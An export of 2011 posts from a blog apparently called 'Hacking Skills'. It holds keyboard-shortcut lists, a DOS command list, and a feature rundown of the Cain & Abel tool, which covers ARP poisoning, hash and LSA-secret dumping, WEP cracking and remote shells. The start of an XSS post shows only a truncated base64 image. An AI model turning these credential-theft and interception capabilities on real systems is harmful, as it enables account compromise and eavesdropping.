Microsoft Natural Keyboard with IntelliType Software Installed<br />Win + L: Log off Windows.<br />Win + P: Open Print Manager.<br />Win + C: Open control panel.<br />Win + V: Open clipboard.<br />Win + K: Open keyboard properties.<br />Win + I: Open mouse properties.<br />Win + A: Open Accessibility properties.<br />Win + Space: Displays the list of Microsoft IntelliType shortcut keys.<br />Win + S: Toggle CapsLock on and off.<br /><br />7.) Remote Desktop Connection Navigation<br /><br /><br /><br />Ctrl + Alt + End: Open the NT Security dialog.<br />Alt + PageUp: Switch between programs.<br />Alt + PageDown: Switch between programs in reverse.<br />Alt + Insert: Cycle through the programs in most recently used order.<br />Alt + Home: Display start menu.<br />Ctrl + Alt + Break: Switch the client computer between a window and a full screen.<br />Alt + Delete: Display the Windows menu.<br />Ctrl + Alt + NumpadMinus: Place a snapshot of the entire client window area on the Terminal server clipboard and provide the same functionality as pressing Alt + PrintScreen on a local computer.<br />Ctrl + Alt + NumpadPlus: Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PrintScreen on a local computer.<br /><br />8.) 
Mozilla Firefox Shortcuts<br />Ctrl + Tab or Ctrl + PageDown: Cycle through tabs.<br />Ctrl + Shift + Tab or Ctrl + PageUp: Cycle through tabs in reverse.<br />Ctrl + (1-9): Switch to tab corresponding to number.<br />Ctrl + N: New window.<br />Ctrl + T: New tab.<br />Ctrl + L or Alt + D or F6: Switch focus to location bar.<br />Ctrl + Enter: Open location in new tab.<br />Shift + Enter: Open location in new window.<br />Ctrl + K or Ctrl + E: Switch focus to search bar.<br />Ctrl + O: Open a local file.<br />Ctrl + W: Close tab, or window if there's only one tab open.<br />Ctrl + Shift + W: Close window.<br />Ctrl + S: Save page as a local file.<br />Ctrl + P: Print page.<br />Ctrl + F or F3: Open find toolbar.<br />Ctrl + G or F3: Find next...<br />Ctrl + Shift + G or Shift + F3: Find previous...<br />Ctrl + B or Ctrl + I: Open Bookmarks sidebar.<br />Ctrl + H: Open History sidebar.<br />Escape: Stop loading page.<br />Ctrl + R or F5: Reload current page.<br />Ctrl + Shift + R or Ctrl + F5: Reload current page; bypass cache.<br />Ctrl + U: View page source.<br />Ctrl + D: Bookmark current page.<br />Ctrl + NumpadPlus or Ctrl + Equals (+/=): Increase text size.<br />Ctrl + NumpadMinus or Ctrl + Minus: Decrease text size.<br />Ctrl + Numpad0 or Ctrl + 0: Set text size to default.<br />Alt + Left or Backspace: Back.<br />Alt + Right or Shift + Backspace: Forward.<br />Alt + Home: Open home page.<br />Ctrl + M: Open new message in integrated mail client.<br />Ctrl + J: Open Downloads dialog.<br />F6: Switch to next frame. You must have selected something on the page already, e.g. by use of Tab.<br />Shift + F6: Switch to previous frame.<br />Apostrophe ('): Find link as you type.<br />Slash (/): Find text as you type.<br /><br />9.) 
GMail<br />Note: Must have "keyboard shortcuts" on in settings.<br />C: Compose new message.<br />Shift + C: Open new window to compose new message.<br />Slash (/): Switch focus to search box.<br />K: Switch focus to the next most recent email. Enter or "O" opens focused email.<br />J: Switch focus to the next oldest email.<br />N: Switch focus to the next message in the "conversation." Enter or "O" expands/collapses messages.<br />P: Switch focus to the previous message.<br />U: Takes you back to the inbox and checks for new mail.<br />Y: Various actions depending on current view:<br />Has no effect in "Sent" and "All Mail" views.<br />Inbox: Archive email or message.<br />Starred: Unstar email or message.<br />Spam: Unmark as spam and move back to "Inbox."<br />Trash: Move back to "Inbox."<br />Any label: Remove the label.<br />X: "Check" an email. Various actions can be performed against all checked emails.<br />S: "Star" an email. Identical to the more familiar term, "flagging."<br />R: Reply to the email.<br />A: Reply to all recipients of the email.<br />F: Forward an email.<br />Shift + R: Reply to the email in a new window.<br />Shift + A: Reply to all recipients of the email in a new window.<br />Shift + F: Forward an email in a new window.<br />Shift + 1 (!): Mark an email as spam and remove it from the inbox.<br />G then I: Switch to "Inbox" view.<br />G then S: Switch to "Starred" view.<br />G then A: Switch to "All Mail" view.<br />G then C: Switch to "Contacts" view.<br />G then S: Switch to "Drafts" view.<br /><br /><br />10.) 
List of F1-F9 Key Commands for the Command Prompt<br /><br />F1 / right arrow: Repeats the letters of the last command line, one by one.<br />F2: Displays a dialog asking user to "enter the char to copy up to" of the last command line<br />F3: Repeats the last command line<br />F4: Displays a dialog asking user to "enter the char to delete up to" of the last command line<br />F5: Goes back one command line<br />F6: Enters the traditional CTRL+Z (^z)<br />F7: Displays a menu with the command line history<br />F8: Cycles back through previous command lines (beginning with most recent)<br />F9: Displays a dialog asking user to enter a command number, where 0 is for first command line entered.<br />Alt + Enter: Toggle full screen mode.<br />Up/Down: Scroll through/repeat previous entries<br />Esc: Delete line<br />Note: The buffer allows a maximum of 50 command lines. After this number is reached, the first line will be replaced in sequence.<br /><br /><br />1. F1 Help</span></strong></span></span><br /><span class="Apple-style-span" style="border-collapse: separate; color: black; font-family: 'Times New Roman'; font-size: small; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span class="Apple-style-span" style="color: #333333; font-family: Verdana,sans-serif; font-size: 13px; line-height: 19px; text-align: left;"><strong><span style="font-family: arial;">2. F2 Rename an item<br />3. F3 Open files<br />4. ALT+F4 Close window or quit program<br />5. F10 Activate the menu bar in a program<br />6. CTRL+ ESC Open Start menu, use the arrow keys to select an item, or TAB to select the taskbar<br />7. ALT+ TAB Return to previous program, or hold down the ALT key while repeatedly pressing tab to cycle through open programs<br />8. SHIFT+ DEL Delete items permanently without sending to recycle bin<br />9. 
CTRL+ A Highlight all the items in the window<br />10. CTRL+ C Copy<br />11. CTRL+ X Cut<br />12. CTRL+ V Paste<br />13. CTRL+ Z Undo<br />14. CTRL+ Y Redo<br />FOR INTERNET EXPLORER AND NETSCAPE<br />15. Home Jumps to the beginning of the page<br />16. END Jumps to the end of the page<br />17. ESC Stops the current page from loading<br />18. F11 Toggles full screen view<br />19. ALT+ LEFT ARROW Goes back to the previous page<br />20. ALT+ RIGHT ARROW Goes forward to the next page<br />21. ALT+ Home Goes to your Home page<br />22. CTRL+ N Opens a new browser window<br />23. CTRL+ W Closes the active window<br />24. CTRL+ O Opens the address book<br />25. CTRL+ R Reloads the current page<br />26. CTRL+ B Opens the Organized Favorites or Bookmarks windows<br />27. CTRL+ D Add the current page to your Favorites or Bookmarks<br />28. CTRL+ H Opens the history folder<br />29. CTRL+ F Finds text on the current page<br /><br /><br />CONTROL OVER A TO Z<br />One of the keys whose importance may have gone unnoticed by most of us is the Control key (Ctrl). The Control key in combination with the 26 alphabet keys can make a lot of our work easier than we think. The following key combinations come in handy when we want to get tasks done faster than with the mouse.<br />Operations that can be performed on the text selected:-<br />30. CTRL+ A Select all<br />31. CTRL+ B Bold<br />32. CTRL+ C Copy<br />33. CTRL+ E Justify center<br />34. CTRL+ I Italics<br />35. CTRL+ J Justify full<br />36. CTRL+ L Justify Left<br />37. CTRL+ M Indent<br />38. CTRL+ Q Remove paragraph Formatting<br />39. CTRL+ R Justify right<br />40. CTRL+ T Margin release<br />41. CTRL+ U Underline<br />These key combos can be used for other operations:-<br />42. CTRL+ D Opens Font Dialog Box<br />43. CTRL+ F Find<br />44. CTRL+ G Go to page, section, line, heading etc<br />45. CTRL+ H Find and replace<br />46. CTRL+ K Insert Hyperlink<br />47. CTRL+ N Open a new document<br />48. 
CTRL+ O Open an existing document<br />49. CTRL+ S Save<br />50. CTRL+ W Close an existing document<br />51. CTRL+ Y Redo<br />52. CTRL+ Z Undo<br />Besides the alphabet keys, a combination of other keys also helps:-<br />53. CTRL+ LEFT ARROW Jumps one word left<br />54. CTRL+ RIGHT ARROW Jumps one word right<br />55. CTRL+ DOWN ARROW Jumps one para down<br />56. CTRL+ UP ARROW Jumps one para up<br />57. CTRL+ BACKSPACE Delete one word left<br />58. CTRL+ DELETE Delete one word right<br />59. CTRL+ PAGE UP To the beginning of the previous page<br />60. CTRL+ PAGE DOWN To the beginning of the next page<br />61. CTRL+ P Print Dialog box</span></strong></span></span></div>Hacking Skillshttp://www.blogger.com/profile/13163124608674451144noreply@blogger.com0tag:blogger.com,1999:blog-289744729559414161.post-42361423580753437192011-02-25T06:54:00.000-08:002011-06-27T20:13:52.750-07:00All Dos Commands<div dir="ltr" style="text-align: left;" trbidi="on"><span style="font-size: small;">ADDUSERS Add or list users to/from a CSV file<br />ARP Address Resolution Protocol<br />ASSOC Change file extension associations<br />ASSOCIAT One step file association<br />AT Schedule a command to run at a later time<br />ATTRIB Change file attributes<br /><br />BOOTCFG Edit Windows boot settings<br />BROWSTAT Get domain, browser and PDC info<br /><br />CACLS Change file permissions<br />CALL Call one batch program from another<br />CD Change Directory - move to a specific Folder<br />CHANGE Change Terminal Server Session properties<br />CHKDSK Check Disk - check and repair disk problems<br />CHKNTFS Check the NTFS file system<br />CHOICE Accept keyboard input to a batch file<br />CIPHER Encrypt or Decrypt files/folders<br />CleanMgr Automated cleanup of Temp files, recycle bin<br />CLEARMEM Clear memory leaks<br />CLIP Copy STDIN to the Windows clipboard.<br />CLS Clear the screen<br />CLUSTER Windows Clustering<br />CMD Start a new CMD shell<br />COLOR Change colors of the CMD window<br 
/>COMP Compare the contents of two files or sets of files<br />COMPACT Compress files or folders on an NTFS partition<br />COMPRESS Compress individual files on an NTFS partition<br />CON2PRT Connect or disconnect a Printer<br />CONVERT Convert a FAT drive to NTFS.<br />COPY Copy one or more files to another location<br />CSVDE Import or Export Active Directory data<br /><br />DATE Display or set the date<br />Dcomcnfg DCOM Configuration Utility<br />DEFRAG Defragment hard drive<br />DEL Delete one or more files<br />DELPROF Delete NT user profiles<br />DELTREE Delete a folder and all subfolders<br />DevCon Device Manager Command Line Utility<br />DIR Display a list of files and folders<br />DIRUSE Display disk usage<br />DISKCOMP Compare the contents of two floppy disks<br />DISKCOPY Copy the contents of one floppy disk to another<br />DNSSTAT DNS Statistics<br />DOSKEY Edit command line, recall commands, and create macros<br />DSADD Add user (computer, group..) to active directory<br />DSQUERY List items in active directory<br />DSMOD Modify user (computer, group..) 
in active directory<br /><br />ECHO Display message on screen<br />ENDLOCAL End localisation of environment changes in a batch file<br />ERASE Delete one or more files<br />EXIT Quit the CMD shell<br />EXPAND Uncompress files<br />EXTRACT Uncompress CAB files<br /><br />FC Compare two files<br />FDISK Disk Format and partition<br />FIND Search for a text string in a file<br />FINDSTR Search for strings in files<br />FOR Conditionally perform a command several times<br />FORFILES Batch process multiple files<br />FORMAT Format a disk<br />FREEDISK Check free disk space (in bytes)<br />FSUTIL File and Volume utilities<br />FTP File Transfer Protocol<br />FTYPE Display or modify file types used in file extension associations<br /><br />GLOBAL Display membership of global groups<br />GOTO Direct a batch program to jump to a labelled line<br /><br />HELP Online Help<br />HFNETCHK Network Security Hotfix Checker<br /><br />IF Conditionally perform a command<br />IFMEMBER Is the current user in an NT Workgroup<br />IPCONFIG Configure IP<br /><br />KILL Remove a program from memory<br /><br />LABEL Edit a disk label<br />LOCAL Display membership of local groups<br />LOGEVENT Write text to the NT event viewer.<br />LOGOFF Log a user off<br />LOGTIME Log the date and time in a file<br /><br />MAPISEND Send email from the command line<br />MEM Display memory usage<br />MD Create new folders<br />MODE Configure a system device<br />MORE Display output, one screen at a time<br />MOUNTVOL Manage a volume mount point<br />MOVE Move files from one folder to another<br />MOVEUSER Move a user from one domain to another<br />MSG Send a message<br />MSIEXEC Microsoft Windows Installer<br />MSINFO Windows NT diagnostics<br />MSTSC Terminal Server Connection (Remote Desktop Protocol)<br />MUNGE Find and Replace text within file(s)<br />MV Copy in-use files<br /><br />NET Manage network resources<br />NETDOM Domain Manager<br />NETSH Configure network protocols<br />NETSVC Command-line 
Service Controller<br />NBTSTAT Display networking statistics (NetBIOS over TCP/IP)<br />NETSTAT Display networking statistics (TCP/IP)<br />NOW Display the current Date and Time<br />NSLOOKUP Name server lookup<br />NTBACKUP Backup folders to tape<br />NTRIGHTS Edit user account rights<br /><br />PATH Display or set a search path for executable files<br />PATHPING Trace route plus network latency and packet loss<br />PAUSE Suspend processing of a batch file and display a message<br />PERMS Show permissions for a user<br />PERFMON Performance Monitor<br />PING Test a network connection<br />POPD Restore the previous value of the current directory saved by PUSHD<br />PORTQRY Display the status of ports and services<br />PRINT Print a text file<br />PRNCNFG Display, configure or rename a printer<br />PRNMNGR Add, delete, list printers set the default printer<br />PROMPT Change the command prompt<br />PsExec Execute process remotely<br />PsFile Show files opened remotely<br />PsGetSid Display the SID of a computer or a user<br />PsInfo List information about a system<br />PsKill Kill processes by name or process ID<br />PsList List detailed information about processes<br />PsLoggedOn Who's logged on (locally or via resource sharing)<br />PsLogList Event log records<br />PsPasswd Change account password<br />PsService View and control services<br />PsShutdown Shutdown or reboot a computer<br />PsSuspend Suspend processes<br />PUSHD Save and then change the current directory<br /><br />QGREP Search file(s) for lines that match a given pattern.<br /><br />RASDIAL Manage RAS connections<br />RASPHONE Manage RAS connections<br />RECOVER Recover a damaged file from a defective disk.<br />REG Read, Set or Delete registry keys and values<br />REGEDIT Import or export registry settings<br />REGSVR32 Register or unregister a DLL<br />REGINI Change Registry Permissions<br />REM Record comments (remarks) in a batch file<br />REN Rename a file or files.<br />REPLACE Replace or 
update one file with another<br />RD Delete folder(s)<br />RDISK Create a Recovery Disk<br />RMTSHARE Share a folder or a printer<br />ROBOCOPY Robust File and Folder Copy<br />ROUTE Manipulate network routing tables<br />RUNAS Execute a program under a different user account<br />RUNDLL32 Run a DLL command (add/remove print connections)<br /><br />SC Service Control<br />SCHTASKS Create or Edit Scheduled Tasks<br />SCLIST Display NT Services<br />ScriptIt Control GUI applications<br />SET Display, set, or remove environment variables<br />SETLOCAL Begin localisation of environment changes in a batch file<br />SETX Set environment variables permanently<br />SHARE List or edit a file share or print share<br />SHIFT Shift the position of replaceable parameters in a batch file<br />SHORTCUT Create a windows shortcut (.LNK file)<br />SHOWGRPS List the NT Workgroups a user has joined<br />SHOWMBRS List the Users who are members of a Workgroup<br />SHUTDOWN Shutdown the computer<br />SLEEP Wait for x seconds<br />SOON Schedule a command to run in the near future<br />SORT Sort input<br />START Start a separate window to run a specified program or command<br />SU Switch User<br />SUBINACL Edit file and folder Permissions, Ownership and Domain<br />SUBST Associate a path with a drive letter<br />SYSTEMINFO List system configuration<br /><br />TASKLIST List running applications and services<br />TIME Display or set the system time<br />TIMEOUT Delay processing of a batch file<br />TITLE Set the window title for a CMD.EXE session<br />TOUCH Change file timestamps<br />TRACERT Trace route to a remote host<br />TREE Graphical display of folder structure<br />TYPE Display the contents of a text file<br /><br />USRSTAT List domain usernames and last login<br /><br />VER Display version information<br />VERIFY Verify that files have been saved<br />VOL Display a disk label<br /><br />WHERE Locate and display files in a directory tree<br />WHOAMI Output the current UserName and 
domain<br />WINDIFF Compare the contents of two files or sets of files<br />WINMSD Windows system diagnostics<br />WINMSDP Windows system diagnostics II<br />WMIC WMI Commands<br /><br />XCACLS Change file permissions<br />XCOPY Copy files and folders</span></div>
Hacking Skills
http://www.blogger.com/profile/13163124608674451144
noreply@blogger.com
0
tag:blogger.com,1999:blog-289744729559414161.post-8217604667091446237
2011-02-23T11:39:00.000-08:00
2011-06-27T20:13:52.750-07:00
Intro: Cain And Abel Tool
<div dir="ltr" style="text-align: left;" trbidi="on"><span class="Apple-style-span" style="color: #333333; font-family: arial, verdana, geneva, sans-serif; font-size: 12px; line-height: 16px;"><div style="margin-bottom: 15px; margin-top: 0px;">This is the tool I used sometimes to recover passwords that I have forgotten. I do not encourage hacking. This tool is actually considered a backdoor sometimes by some of the security software in the market. Personally I think it is useful, but people tend to abuse it.</div><div style="margin-bottom: 15px; margin-top: 0px;"><a href="http://www.oxid.it/cain.html" style="color: #0066cc; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: underline;">Cain & Abel</a> is a password recovery tool for Microsoft Operating Systems.
It allows easy recovery of various kinds of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols.</div><div style="margin-bottom: 15px; margin-top: 0px;">Cain & Abel has been developed in the hope that it will be useful for network administrators, teachers, security consultants/professionals, forensic staff, security software vendors, professional penetration testers and everyone else that plans to use it for ethical reasons.</div><div style="margin-bottom: 15px; margin-top: 0px;"><span id="more-157"></span></div><div style="margin-bottom: 15px; margin-top: 0px;"></div><div style="margin-bottom: 15px; margin-top: 0px;">The tool is divided into two parts, Cain and Abel.</div><div style="margin-bottom: 15px; margin-top: 0px;"><strong>Cain’s features</strong></div><div style="margin-bottom: 15px; margin-top: 0px;"><a href="http://twit88.com/blog/wp-content/uploads/2007/10/cain.png" style="color: #0066cc; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: underline;" title=""><img alt="" src="http://twit88.com/blog/wp-content/uploads/2007/10/cain.png" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" /></a></div><ol><li style="list-style-type: decimal;">Protected Storage Password Manager<br />Reveals locally stored passwords of Outlook, Outlook Express, Outlook Express Identities, Outlook 2002, Internet Explorer and MSN Explorer.</li><li style="list-style-type: decimal;">Credential Manager Password Decoder<br />Reveals passwords stored in Enterprise and Local Credential Sets on Windows XP/2003.</li><li style="list-style-type: decimal;">LSA Secrets Dumper<br />Dumps the contents of
the Local Security Authority Secrets.</li><li style="list-style-type: decimal;">Dialup Password Decoder<br />Reveals passwords stored by the Windows “Dial-Up Networking” component.</li><li style="list-style-type: decimal;">APR (ARP Poison Routing)<br />Enables sniffing on switched networks and Man-in-the-Middle attacks.</li><li style="list-style-type: decimal;">Route Table Manager<br />Provides the same functionality as the Windows tool “route.exe” with a GUI front-end.</li><li style="list-style-type: decimal;">SID Scanner<br />Extracts user names associated with Security Identifiers (SIDs) on a remote system.</li><li style="list-style-type: decimal;">Network Enumerator<br />Retrieves, where possible, the user names, groups, shares, and services running on a machine.</li><li style="list-style-type: decimal;">Service Manager<br />Allows you to stop, start, pause/continue or remove a service.</li><li style="list-style-type: decimal;">Sniffer<br />Captures passwords, hashes and authentication information while they are transmitted on the network. Includes several filters for application-specific authentications and routing protocols. The VoIP filter enables the capture of voice conversations transmitted with the SIP/RTP protocol, which are later saved as WAV files.</li><li style="list-style-type: decimal;">Routing Protocol Monitors<br />Monitors messages from various routing protocols (HSRP, VRRP, RIPv1, RIPv2, EIGRP, OSPF) to capture authentications and shared route tables.</li><li style="list-style-type: decimal;">Full RDP sessions sniffer for APR (APR-RDP)<br />Allows you to capture all data sent in a Remote Desktop Protocol (RDP) session on the network.
Provides interception of client-side keystroke activity.</li><li style="list-style-type: decimal;">Full SSH-1 sessions sniffer for APR (APR-SSH-1)<br />Allows you to capture all data sent in an SSH-1 session on the network.</li><li style="list-style-type: decimal;">Full HTTPS sessions sniffer for APR (APR-HTTPS)<br />Allows you to capture all data sent in an HTTPS session on the network.</li><li style="list-style-type: decimal;">Certificates Collector<br />Grabs certificates from HTTPS web sites and prepares them to be used by APR-HTTPS.</li><li style="list-style-type: decimal;">MAC Address Scanner with OUI fingerprint<br />Using the OUI fingerprint, this makes an informed guess about what type of device the MAC address is from.</li><li style="list-style-type: decimal;">Promiscuous-mode Scanner based on ARP packets<br />Identifies sniffers and network Intrusion Detection systems present on the LAN.</li><li style="list-style-type: decimal;">Wireless Scanner<br />Can scan for wireless network signals within range, giving details on each network’s MAC address, when it was last seen, the guessed vendor, signal strength, the name of the network (SSID), whether it has WEP or not (note WPA encrypted networks will show up as WEPed), whether the network is an Ad-Hoc network or Infrastructure, what channel the network is operating at and at what speed the network is operating (e.g. 11Mbps).
Passive scanning and WEP IVs sniffing are also supported using the AirPcap adapter from CACE Technologies.</li><li style="list-style-type: decimal;">802.11 Capture Files Decoder<br />Decodes 802.11 capture files (wireshark, pcap) containing wireless frames encrypted with WEP or WPA-PSK.</li><li style="list-style-type: decimal;">Access (9x/2000/XP) Database Passwords Decoder<br />Decodes the stored encrypted passwords for Microsoft Access Database files.</li><li style="list-style-type: decimal;">Base64 Password Decoder<br />Decodes Base64 encoded strings.</li><li style="list-style-type: decimal;">Cisco Type-7 Password Decoder<br />Decodes Cisco Type-7 passwords used in router and switch configuration files.</li><li style="list-style-type: decimal;">Cisco VPN Client Password Decoder<br />Decodes Cisco VPN Client passwords stored in connection profiles (*.pcf).</li><li style="list-style-type: decimal;">VNC Password Decoder<br />Decodes encrypted VNC passwords from the registry.</li><li style="list-style-type: decimal;">Enterprise Manager Password Decoder<br />Decodes passwords used by Microsoft SQL Server Enterprise Manager (SQL 7.0 and 2000 supported).</li><li style="list-style-type: decimal;">Remote Desktop Password Decoder<br />Decodes passwords in Remote Desktop Profiles (.RDP files).</li><li style="list-style-type: decimal;">PWL Cached Password Decoder<br />Allows you to view all cached resources and their respective passwords in clear text either from locked or unlocked password list files.</li><li style="list-style-type: decimal;">Password Crackers<br />Enables the recovery of clear text passwords scrambled using several hashing or encryption algorithms. All crackers support Dictionary and Brute-Force attacks.</li><li style="list-style-type: decimal;">Cryptanalysis attacks<br />Enables password cracking using the ‘Faster Cryptanalytic time – memory trade off’ method introduced by Philippe Oechslin.
This cracking technique uses a set of large tables of precalculated encrypted passwords, called Rainbow Tables, to improve the trade-off methods known today and to speed up the recovery of clear text passwords.</li><li style="list-style-type: decimal;">WEP Cracker<br />Performs Korek’s WEP Attack on 802.11 capture files containing WEP initialization vectors.</li><li style="list-style-type: decimal;">Rainbowcrack-online client<br />Enables password cracking by means of the outstanding power of this on-line cracking service based on RainbowTable technology.</li><li style="list-style-type: decimal;">NT Hash Dumper + Password History Hashes (works with Syskey enabled)<br />Will retrieve the NT password hash from the SAM file regardless of whether Syskey is enabled or not.</li><li style="list-style-type: decimal;">Syskey Decoder<br />Will retrieve the Boot Key used by the SYSKEY utility from the local registry or “off-line” SYSTEM files.</li><li style="list-style-type: decimal;">MSCACHE Hashes Dumper<br />Will retrieve the MSCACHE password hashes stored in the local registry.</li><li style="list-style-type: decimal;">Wireless Zero Configuration Password Dumper<br />Will retrieve the wireless keys stored by Windows Wireless Configuration Service.</li><li style="list-style-type: decimal;">Microsoft SQL Server 2000 Password Extractor via ODBC<br />Connects to an SQL server via ODBC and extracts all users and passwords from the master database.</li><li style="list-style-type: decimal;">Oracle Password Extractor via ODBC<br />Connects to an Oracle server via ODBC and extracts all users and passwords from the database.</li><li style="list-style-type: decimal;">MySQL Password Extractor via ODBC<br />Connects to a MySQL server via ODBC and extracts all users and passwords from the database.</li><li style="list-style-type: decimal;">Box Revealer<br />Shows passwords hidden behind asterisks in password dialog boxes.</li><li style="list-style-type: decimal;">RSA SecurID
Token Calculator<br />Can calculate the RSA key given the token’s .ASC file.</li><li style="list-style-type: decimal;">Hash Calculator<br />Produces the hash values of a given text.</li><li style="list-style-type: decimal;">TCP/UDP Table Viewer<br />Shows the state of local ports (like netstat).</li><li style="list-style-type: decimal;">TCP/UDP/ICMP Traceroute with DNS resolver and WHOIS client<br />An improved traceroute that can use TCP, UDP and ICMP protocols and provides whois client capabilities.</li><li style="list-style-type: decimal;">Cisco Config Downloader/Uploader (SNMP/TFTP)<br />Downloads or uploads the configuration file from/to a specified Cisco device (IP or host name) given the SNMP read/write community string.</li></ol><div style="margin-bottom: 15px; margin-top: 0px;"></div><div style="margin-bottom: 15px; margin-top: 0px;"><strong>Abel features</strong></div><div style="margin-bottom: 15px; margin-top: 0px;"><a href="http://twit88.com/blog/wp-content/uploads/2007/10/console.jpg" style="color: black; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: underline;" title=""><img alt="" src="http://twit88.com/blog/wp-content/uploads/2007/10/console.jpg" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" /></a></div><ol><li style="list-style-type: decimal;">Remote Console<br />Provides a remote system shell on the remote machine.</li><li style="list-style-type: decimal;">Remote Route Table Manager<br />Enables you to manage the route table of the remote system.</li><li style="list-style-type: decimal;">Remote TCP/UDP Table Viewer<br />Shows the state of local ports (like netstat) on the remote system.</li><li style="list-style-type: decimal;">Remote NT Hash Dumper + Password History Hashes (works with Syskey enabled)<br />Will retrieve the NT password hash from the SAM file regardless of whether Syskey is enabled
or not; works on the Abel-side.</li><li style="list-style-type: decimal;">Remote LSA Secrets Dumper<br />Dumps the contents of the Local Security Authority Secrets present on the remote system.</li></ol></span></div>
Hacking Skills
http://www.blogger.com/profile/13163124608674451144
noreply@blogger.com
0
tag:blogger.com,1999:blog-289744729559414161.post-5423496760736283115
2011-02-18T08:16:00.000-08:00
2011-06-27T20:13:52.750-07:00
How to Start with XSS Hacking?
<div dir="ltr" style="text-align: left;" trbidi="on"><div style="text-align: center;"><img alt="" src="data:image/png;base64,
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
